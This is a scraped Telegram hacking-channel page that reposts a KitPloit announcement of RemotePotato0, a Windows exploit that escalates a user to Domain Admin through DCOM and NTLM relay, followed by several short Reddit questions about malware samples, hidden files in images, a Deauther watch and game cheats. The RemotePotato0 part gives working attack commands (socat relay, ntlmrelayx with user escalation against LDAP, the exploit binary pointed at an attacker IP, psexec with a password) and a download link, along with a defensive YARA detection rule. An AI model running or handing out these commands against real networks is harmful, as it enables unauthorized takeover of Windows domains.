Hacking Articles Tips Tricks Videos Tutorials
466 subscribers
65.6K photos
15 videos
157 files
131K links
Exploit
Pentesting
Hacking
Red Team
Blue Team
Kali Linux
Bug Bounty
Black Hat
Cyber security etc

@Hacking_Video
@Hacking_attack
Download Telegram
Hacking Articles Tips Tricks Videos Tutorials
RemotePotato0_1_demo-709924.gif
KitPloit - PenTest Tools!
RemotePotato0 - Just Another "Won't Fix" Windows Privilege Escalation From User To Domain Admin

http://2.bp.blogspot.com/-pWYsKrzpUyo/YOJXRmQ3UjI/AAAAAAAAf88/DRdj-GxhNxMvP9LcDtNU9npAn7B27U0GACK4BGAYYCw/w640-h336/RemotePotato0_1_demo-709924.gif

Just another "Won't Fix" Windows Privilege Escalation from User to Domain Admin.

RemotePotato0 is an exploit that allows you to escalate your privileges from a generic User to Domain Admin.

Briefly:

It abuses the DCOM activation service and trigger an NTLM authentication of the user currently logged on in the target machine. It is required you have a shell in session 0 (e.g. WinRm shell or SSH shell) and that a privileged user is logged on in the session 1 (e.g. a Domain Admin user). Once the NTLM type1 is triggered we setup a cross protocol relay server that receive the privileged type1 message and relay it to a third resource by unpacking the RPC protocol and packing the authentication over HTTP. On the receiving end you can setup a further relay node (eg. ntlmrelayx) or relay directly to a privileged resource.

Full details at --> https://labs.sentinelone.com/relaying-potatoes-dce-rpc-ntlm-relay-eop
Example

Attacker machine (192.168.83.130):

sudo socat TCP-LISTEN:135,fork,reuseaddr TCP:192.168.83.131:9998 &
sudo ntlmrelayx.py -t ldap://192.168.83.135 --no-wcf-server --escalate-user winrm_user_1


Victim machine (192.168.83.131):

.\RemotePotato0.exe -r 192.168.83.130 -p 9998


Victim Domain Controller (192.168.83.135)

Enjoy shell (eg. psexec) as Enterprise Admin to the domain controller ;)

psexec.py 'SPLINTER/winrm_user_1:Password111!@192.168.83.135'


Demo
https://1.bp.blogspot.com/-i-3pnPRIowA/YOTpzCKLGII/AAAAAAAAhkk/-xBaxRDITSI4RBOmknb5R7aLsnQngrtjwCNcBGAsYHQ/w640-h334/RemotePotato0_1_demo.gif
Detection

Yara rule to detect RemotePotato0 binary:

rule SentinelOne_RemotePotato0_privesc {
meta:
author = "SentinelOne"
description = "Detects RemotePotato0 binary"
reference = "https://labs.sentinelone.com/relaying-potatoes-dce-rpc-ntlm-relay-eop"

strings:
$import1 = "CoGetInstanceFromIStorage"
$istorage_clsid = "{00000306-0000-0000-c000-000000000046}" nocase wide ascii
$meow_header = { 4d 45 4f 57 }
$clsid1 = "{11111111-2222-3333-4444-555555555555}" nocase wide ascii
$clsid2 = "{5167B42F-C111-47A1-ACC4-8EABE61B0B54}" nocase wide ascii

condition:
(uint16(0) == 0x5A4D) and $import1 and $istorage_clsid and $meow_header and 1 of ($clsid*)
}


Authors

* Antonio Cocomazzi
* Andrea Pierini

Credits

* Impacket
Download RemotePotato0

___________________________
@hacking_Attack
@Hacking_Video
hacking: security in practice
Can anybody TL;DR rarjpeg?

So my friend tells me about this thing that can glue images together to hide files within images... And it's quite volatile and dangerous to our peculiar happenstance.

Is this the right subreddit to be posting about this? What can be done to prevent/detect this?

submitted by /u/Davidier
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
hacking: security in practice
Looking for malware samples

Looking to find a good source of malware samples to download and analyze. Currently testing with SentinelOne EDR/AV and trying to learn the software and study the results of a compromise.

I used to have a subscription to virustotal, but no longer have access.

Any suggestions?

submitted by /u/PrimaryWatercress759
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
hacking: security in practice
There a better case for a Deauther watch V3?

Is there a better case? I’d like to replace it and just use it not as a watch (too bulky)? Saw Ed Calderon have one, I kinda want a setup similar to that

submitted by /u/mav_xiii
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
hacking: security in practice
rust

So I recently paid a guy to make me rust cheats so I could sell it to sum people. Im pretty sure the file he sent was a virus, but I'm not sure. Is there any way of checking?

submitted by /u/Emerald_Sniper
[link] [comments]
hacking: security in practice
House hold items acting up

The lights in the front of my house have been blinking on and off when I take my dog out to pee at night and my door bell camera doesn’t work during that time. It happens quite often. Apparently my wifi has “weak security.” Maybe just paranoid but it’s a little too coincidental in my opinion to be happening this often. Lights aren’t connected to WiFi. Can anyone offer any insight? If not that’s cool. First time posting on here.

submitted by /u/tonitone223
[link] [comments]